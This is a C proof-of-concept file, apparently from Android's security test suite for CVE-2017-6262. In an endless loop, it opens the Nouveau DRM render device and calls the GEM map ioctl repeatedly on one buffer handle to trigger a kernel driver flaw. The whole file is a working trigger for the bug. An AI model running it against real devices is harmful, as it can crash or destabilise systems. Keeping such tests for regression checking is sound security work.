Home | History | Annotate | Download | only in CVE-2017-6262 
      1 /**
      2  * Copyright (C) 2018 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions vand
     14  * limitations under the License.
     15  */
     16 #define _GNU_SOURCE
     17 #include "local_poc.h"
     18 #include <fcntl.h>
     19 #include <stdio.h>
     20 #include <stdlib.h>
     21 #include <string.h>
     22 #include <sys/ioctl.h>
     23 #include <sys/prctl.h>
     24 #include <sys/stat.h>
     25 #include <sys/types.h>
     26 #include <sys/wait.h>
     27 #include <unistd.h>
     28 #define DRMDEV_NAME "/dev/dri/renderD128"
     29 
     30 static int drm_version(int fd)
     31 {
     32   int ret;
     33   struct drm_version ver;
     34   ver.name_len = 100;
     35   ver.date_len = 100;
     36   ver.desc_len = 100;
     37 
     38   ver.name = (char*)malloc(ver.name_len);
     39   ver.date = (char*)malloc(ver.date_len);
     40   ver.desc = (char*)malloc(ver.desc_len);
     41 
     42   ret = ioctl(fd, DRM_IOCTL_VERSION, &ver);
     43 
     44   if (ret == -1) {
     45     return -1;
     46   }
     47   return 0;
     48 }
     49 
     50 static int nouveau_gem_ioctl_new(int fd)
     51 {
     52   int ret;
     53   struct drm_nouveau_gem_new new_arg;
     54 
     55   memset(&new_arg, 0, sizeof(new_arg));
     56 
     57   new_arg.info.size = 0x1000;
     58   new_arg.info.domain = NOUVEAU_GEM_DOMAIN_GART;
     59 
     60   ret = ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_NEW, &new_arg);
     61   if (ret == -1) {
     62     return -1;
     63   }
     64 
     65   return new_arg.info.handle;
     66 }
     67 
     68 static uint32_t get_gem_map_handle(int fd)
     69 {
     70   uint32_t handle;
     71 
     72   handle = nouveau_gem_ioctl_new(fd);
     73 
     74   return handle;
     75 }
     76 
     77 static void nouveau_gem_ioctl_map(int fd, uint32_t handle)
     78 {
     79   int ret;
     80   struct drm_nouveau_gem_map map_arg;
     81   memset(&map_arg, 0, sizeof(map_arg));
     82   map_arg.handle = handle;
     83   map_arg.length = 0x1000;
     84 
     85   ret = ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_MAP, &map_arg);
     86   if (ret == -1) {
     87     return;
     88   }
     89 }
     90 
     91 int looploop()
     92 {
     93   int fd;
     94 
     95   fd = open(DRMDEV_NAME, O_RDWR);
     96   if (fd == -1) {
     97     return -1;
     98   }
     99 
    100   if (drm_version(fd) == -1)
    101     return -1;
    102 
    103   uint32_t handle = get_gem_map_handle(fd);
    104 
    105   nouveau_gem_ioctl_map(fd, handle);
    106   nouveau_gem_ioctl_map(fd, handle);
    107   nouveau_gem_ioctl_map(fd, handle);
    108   nouveau_gem_ioctl_map(fd, handle);
    109   nouveau_gem_ioctl_map(fd, handle);
    110   nouveau_gem_ioctl_map(fd, handle);
    111   nouveau_gem_ioctl_map(fd, handle);
    112   nouveau_gem_ioctl_map(fd, handle);
    113   nouveau_gem_ioctl_map(fd, handle);
    114   nouveau_gem_ioctl_map(fd, handle);
    115 
    116   close(fd);
    117 
    118   return 0;
    119 }
    120 
    121 int main()
    122 {
    123   while (1) {
    124     looploop();
    125   }
    126 }
    127